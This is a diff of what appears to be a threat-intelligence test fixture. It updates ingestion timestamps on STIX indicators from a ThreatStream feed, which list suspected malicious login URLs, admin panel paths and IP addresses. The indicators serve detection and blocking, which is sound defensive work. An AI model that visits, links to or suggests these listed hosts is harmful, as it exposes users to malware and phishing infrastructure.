@@ -7825,7 +7825,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023435800Z", + "ingested": "2021-12-14T14:57:43.118227295Z", "original": "{\"created\":\"2020-01-27T02:55:38.721Z\",\"description\":\"TS ID: 55259870761; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ce0e3226-1587-4fd1-bdd0-aa76c548e8df\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-27T02:55:38.721Z\",\"name\":\"mal_url: http://dufres.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dufres.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:38.721Z\"}", "category": "threat", "type": "indicator", @@ -7876,7 +7876,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023440900Z", + "ingested": "2021-12-14T14:57:43.118227767Z", "original": "{\"created\":\"2020-01-27T02:55:45.512Z\",\"description\":\"TS ID: 55259870706; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--9c90ff74-a454-49c7-afa8-1339915ceac8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-27T02:55:45.512Z\",\"name\":\"mal_url: http://mogut3.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mogut3.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:45.512Z\"}", "category": "threat", "type": "indicator", 
@@ -7927,7 +7927,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023445300Z", + "ingested": "2021-12-14T14:57:43.118228262Z", "original": "{\"created\":\"2020-01-27T02:55:48.012Z\",\"description\":\"TS ID: 55259870655; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--15806179-df3f-450a-baf5-8e2a29d87faa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-27T02:55:48.012Z\",\"name\":\"mal_url: http://vidar321.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://vidar321.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:48.012Z\"}", "category": "threat", "type": "indicator", @@ -7978,7 +7978,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023474600Z", + "ingested": "2021-12-14T14:57:43.118228652Z", "original": "{\"created\":\"2020-01-27T02:55:50.673Z\",\"description\":\"TS ID: 55259870822; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--bc1b9793-42ef-41bf-a370-a68ca5dd8c7f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-27T02:55:50.673Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:50.673Z\"}", "category": "threat", "type": "indicator", 
@@ -8029,7 +8029,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023479800Z", + "ingested": "2021-12-14T14:57:43.118229036Z", "original": "{\"created\":\"2020-01-27T02:56:02.067Z\",\"description\":\"TS ID: 55259870657; iType: mal_url; State: active; Org: Transit Telecom LLC; Source: CyberCrime\",\"id\":\"indicator--d4d45888-5dfb-463b-8d5c-9871157397f9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-17\"],\"modified\":\"2020-01-27T02:56:02.067Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:02.067Z\"}", "category": "threat", "type": "indicator", @@ -8080,7 +8080,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023485700Z", + "ingested": "2021-12-14T14:57:43.118229666Z", "original": "{\"created\":\"2020-01-27T02:56:03.948Z\",\"description\":\"TS ID: 55259870672; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ee8c37a6-cb8b-478c-b527-2506637ceb34\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:03.948Z\",\"name\":\"mal_url: http://turams.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turams.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:03.948Z\"}", "category": "threat", "type": "indicator", 
@@ -8131,7 +8131,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023491300Z", + "ingested": "2021-12-14T14:57:43.118230074Z", "original": "{\"created\":\"2020-01-27T02:56:05.787Z\",\"description\":\"TS ID: 55259870662; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--fd1feff8-dcc5-429a-953d-0bb80951bf5c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-27T02:56:05.787Z\",\"name\":\"mal_url: http://turames8.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turames8.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:05.787Z\"}", "category": "threat", "type": "indicator", @@ -8182,7 +8182,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023498100Z", + "ingested": "2021-12-14T14:57:43.118230459Z", "original": "{\"created\":\"2020-01-27T02:56:17.615Z\",\"description\":\"TS ID: 55259870820; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--f69535bc-4059-445d-90b0-1df8498137a4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:17.615Z\",\"name\":\"mal_url: http://2maga.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://2maga.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:17.615Z\"}", "category": "threat", "type": "indicator", 
@@ -8233,7 +8233,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023503900Z", + "ingested": "2021-12-14T14:57:43.118230849Z", "original": "{\"created\":\"2020-01-27T02:56:17.653Z\",\"description\":\"TS ID: 55259870704; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--a372cefa-0694-4e39-aa50-67be2cded923\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-27T02:56:17.653Z\",\"name\":\"mal_url: http://mogutse.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mogutse.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:17.653Z\"}", "category": "threat", "type": "indicator", @@ -8284,7 +8284,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023507500Z", + "ingested": "2021-12-14T14:57:43.118231350Z", "original": "{\"created\":\"2020-01-27T02:56:22.845Z\",\"description\":\"TS ID: 55259870661; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ff74ddcd-b63b-4c1d-b4e0-8703b74564ab\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:22.845Z\",\"name\":\"mal_url: http://turamesplus.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turamesplus.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:22.845Z\"}", "category": "threat", "type": "indicator", 
@@ -8335,7 +8335,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023511200Z", + "ingested": "2021-12-14T14:57:43.118231998Z", "original": "{\"created\":\"2020-01-27T02:56:23.51Z\",\"description\":\"TS ID: 55259870713; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--360f60db-e8ca-4ede-9f65-7dcb01425d2e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:23.51Z\",\"name\":\"mal_url: http://merops.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://merops.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:23.51Z\"}", "category": "threat", "type": "indicator", @@ -8386,7 +8386,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023514900Z", + "ingested": "2021-12-14T14:57:43.118232458Z", "original": "{\"created\":\"2020-01-27T02:56:23.555Z\",\"description\":\"TS ID: 55259870702; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--bafd8878-321e-4501-ae0f-221772acccae\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:23.555Z\",\"name\":\"mal_url: http://mogut.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mogut.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:23.555Z\"}", "category": "threat", "type": "indicator", 
@@ -8437,7 +8437,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023520300Z", + "ingested": "2021-12-14T14:57:43.118232856Z", "original": "{\"created\":\"2020-01-27T02:56:32.951Z\",\"description\":\"TS ID: 55259870813; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--21811787-57db-4ca6-abb9-57d33500a88e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:32.951Z\",\"name\":\"mal_url: http://2magas.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://2magas.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:32.951Z\"}", "category": "threat", "type": "indicator", @@ -8488,7 +8488,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023527800Z", + "ingested": "2021-12-14T14:57:43.118233247Z", "original": "{\"created\":\"2020-01-27T02:56:37.65Z\",\"description\":\"TS ID: 55259870741; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--80641a7e-afbf-4b8d-96e6-4770491297b4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-27T02:56:37.65Z\",\"name\":\"mal_url: http://merakim.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://merakim.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:37.65Z\"}", "category": "threat", "type": "indicator", 
@@ -8539,7 +8539,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023531700Z", + "ingested": "2021-12-14T14:57:43.118233655Z", "original": "{\"created\":\"2020-01-27T02:56:37.697Z\",\"description\":\"TS ID: 55259870659; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--fb351f4a-90ab-4ff4-a482-b38e7f92bb77\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:37.697Z\",\"name\":\"mal_url: http://turamesv.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turamesv.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:37.697Z\"}", "category": "threat", "type": "indicator", @@ -8590,7 +8590,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023537800Z", + "ingested": "2021-12-14T14:57:43.118234118Z", "original": "{\"created\":\"2020-01-27T02:56:41.827Z\",\"description\":\"TS ID: 55259870687; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--a5ade447-681b-4518-8ea5-779d9de3ff0e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:41.827Z\",\"name\":\"mal_url: http://ramesv.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ramesv.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:41.827Z\"}", "category": "threat", "type": "indicator", 
@@ -8641,7 +8641,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023543600Z", + "ingested": "2021-12-14T14:57:43.118234600Z", "original": "{\"created\":\"2020-01-27T02:56:41.874Z\",\"description\":\"TS ID: 55259870674; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--9a797de6-1aa1-4f5c-b40a-c65699117f57\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-01-27T02:56:41.874Z\",\"name\":\"mal_url: http://roninrol.info/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://roninrol.info/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:41.874Z\"}", "category": "threat", "type": "indicator", @@ -8692,7 +8692,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023547800Z", + "ingested": "2021-12-14T14:57:43.118234988Z", "original": "{\"created\":\"2020-01-27T02:56:49.344Z\",\"description\":\"TS ID: 55259870678; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--7a094f4c-d57d-4bad-9258-a19210782331\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:49.344Z\",\"name\":\"mal_url: http://ramesvet8.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ramesvet8.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:49.344Z\"}", "category": "threat", "type": "indicator", 
@@ -8743,7 +8743,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023552200Z", + "ingested": "2021-12-14T14:57:43.118235392Z", "original": "{\"created\":\"2020-01-27T02:56:53.905Z\",\"description\":\"TS ID: 55259870709; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--6de4e500-4c56-4288-aa8f-b092f194ff78\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:53.905Z\",\"name\":\"mal_url: http://meropsi.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://meropsi.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:53.905Z\"}", "category": "threat", "type": "indicator", @@ -8788,7 +8788,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023558100Z", + "ingested": "2021-12-14T14:57:43.118235884Z", "original": "{\"created\":\"2020-01-27T02:57:06.376Z\",\"description\":\"TS ID: 55259870660; iType: mal_ip; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--c4c00824-3ceb-4b3c-89a2-77d3920aacdb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-27T02:57:06.376Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:06.376Z\"}", "category": "threat", "type": "indicator", 
@@ -8839,7 +8839,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023562200Z", + "ingested": "2021-12-14T14:57:43.118236409Z", "original": "{\"created\":\"2020-01-27T02:57:09.474Z\",\"description\":\"TS ID: 55259870721; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--0e9df710-3a24-4070-9576-f3081708cd67\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:57:09.474Z\",\"name\":\"mal_url: http://meropa.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://meropa.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:09.474Z\"}", "category": "threat", "type": "indicator", @@ -8890,7 +8890,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023567300Z", + "ingested": "2021-12-14T14:57:43.118236813Z", "original": "{\"created\":\"2020-01-27T02:57:12.314Z\",\"description\":\"TS ID: 55259870801; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--4d6b9fe5-43f3-42af-b7c0-171052280208\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:57:12.314Z\",\"name\":\"mal_url: http://5umaga.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://5umaga.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:12.314Z\"}", "category": "threat", "type": "indicator", 
@@ -8941,7 +8941,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023574900Z", + "ingested": "2021-12-14T14:57:43.118237195Z", "original": "{\"created\":\"2020-01-27T02:57:12.344Z\",\"description\":\"TS ID: 55259870773; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--50a15dd9-290b-4240-9245-bbe259bcc4c7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-27T02:57:12.344Z\",\"name\":\"mal_url: http://dufre1.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dufre1.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:12.344Z\"}", "category": "threat", "type": "indicator", @@ -8992,7 +8992,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023585Z", + "ingested": "2021-12-14T14:57:43.118237737Z", "original": "{\"created\":\"2020-01-27T02:57:17.92Z\",\"description\":\"TS ID: 55259870746; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--53b80678-1eeb-433c-bd54-fd1ae9c83c18\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-27T02:57:17.92Z\",\"name\":\"mal_url: http://dufre-tom.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dufre-tom.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:17.92Z\"}", "category": "threat", "type": "indicator", 
@@ -9043,7 +9043,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023592900Z", + "ingested": "2021-12-14T14:57:43.118238127Z", "original": "{\"created\":\"2020-01-27T02:57:19.085Z\",\"description\":\"TS ID: 55259870735; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--b14f43dd-6653-42d4-b0db-3cf4e7fbee87\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:57:19.085Z\",\"name\":\"mal_url: http://meropi.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://meropi.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:19.085Z\"}", "category": "threat", "type": "indicator", @@ -9095,7 +9095,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023596600Z", + "ingested": "2021-12-14T14:57:43.118238514Z", "original": "{\"created\":\"2020-01-28T02:58:19.372Z\",\"description\":\"TS ID: 55263242048; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--e2cdc754-bf45-4c4e-a98a-0fcc1a62cc63\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-28T02:58:19.372Z\",\"name\":\"mal_url: http://serv-node4.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://serv-node4.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:19.372Z\"}", "category": "threat", "type": "indicator", 
@@ -9147,7 +9147,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023600300Z", + "ingested": "2021-12-14T14:57:43.118238905Z", "original": "{\"created\":\"2020-01-28T02:58:19.396Z\",\"description\":\"TS ID: 55263242003; iType: mal_url; State: active; Org: Informacines sistemos ir technologijos, UAB; Source: CyberCrime\",\"id\":\"indicator--f0aa41c1-9c01-420f-9134-20fa6a00f8e5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-28T02:58:19.396Z\",\"name\":\"mal_url: http://usarmyvacations.info/ssd/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://usarmyvacations.info/ssd/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:19.396Z\"}", "category": "threat", "type": "indicator", @@ -9198,7 +9198,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023605600Z", + "ingested": "2021-12-14T14:57:43.118239450Z", "original": "{\"created\":\"2020-01-28T02:58:26.492Z\",\"description\":\"TS ID: 55263242014; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--15b60240-37eb-41c9-9e66-872f19406f6d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-28T02:58:26.492Z\",\"name\":\"mal_url: http://la6e51ed.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://la6e51ed.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:26.492Z\"}", "category": "threat", "type": "indicator", 
@@ -9250,7 +9250,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023613300Z", + "ingested": "2021-12-14T14:57:43.118239832Z", "original": "{\"created\":\"2020-01-28T02:58:26.52Z\",\"description\":\"TS ID: 55263241842; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--6a3a7dfd-7dd0-4b5b-b614-b09f20ae34f3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-49\"],\"modified\":\"2020-01-28T02:58:26.52Z\",\"name\":\"mal_url: http://209.250.247.253/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://209.250.247.253/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:26.52Z\"}", "category": "threat", "type": "indicator", @@ -9302,7 +9302,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023650400Z", + "ingested": "2021-12-14T14:57:43.118240237Z", "original": "{\"created\":\"2020-01-28T02:58:43.041Z\",\"description\":\"TS ID: 55263242045; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--d2de10c5-aaee-4c32-ac0c-0d17ea9c7caf\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-28T02:58:43.041Z\",\"name\":\"mal_url: http://footlooking.kl.com.ua/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://footlooking.kl.com.ua/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:43.041Z\"}", "category": "threat", "type": "indicator", 
@@ -9347,7 +9347,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023654900Z", + "ingested": "2021-12-14T14:57:43.118240681Z", "original": "{\"created\":\"2020-01-28T02:58:43.095Z\",\"description\":\"TS ID: 55263242017; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--8391ee32-499a-4390-b81d-5bd14638be82\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-28T02:58:43.095Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:43.095Z\"}", "category": "threat", "type": "indicator", @@ -9398,7 +9398,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023660600Z", + "ingested": "2021-12-14T14:57:43.118241124Z", "original": "{\"created\":\"2020-01-28T02:58:45.172Z\",\"description\":\"TS ID: 55263242019; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--1a91efe1-ff09-49b2-801b-fb815c843976\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-28T02:58:45.172Z\",\"name\":\"mal_url: http://a0377875.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://a0377875.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:45.172Z\"}", "category": "threat", "type": "indicator", 
@@ -9450,7 +9450,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023664700Z", + "ingested": "2021-12-14T14:57:43.118241508Z", "original": "{\"created\":\"2020-01-28T02:58:46.345Z\",\"description\":\"TS ID: 55263241963; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--9980de5d-7c0e-456a-b2bf-32544fda592b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T02:58:46.345Z\",\"name\":\"mal_url: http://samaaj.org.pk/ofo/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/ofo/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:46.345Z\"}", "category": "threat", "type": "indicator", @@ -9501,7 +9501,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023668800Z", + "ingested": "2021-12-14T14:57:43.118241937Z", "original": "{\"created\":\"2020-01-28T02:58:54.765Z\",\"description\":\"TS ID: 55263242018; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--5da6cfdf-c2a5-45d5-857e-110fc26336f4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-01-28T02:58:54.765Z\",\"name\":\"mal_url: http://f0390226.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0390226.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:54.765Z\"}", "category": "threat", "type": "indicator", 
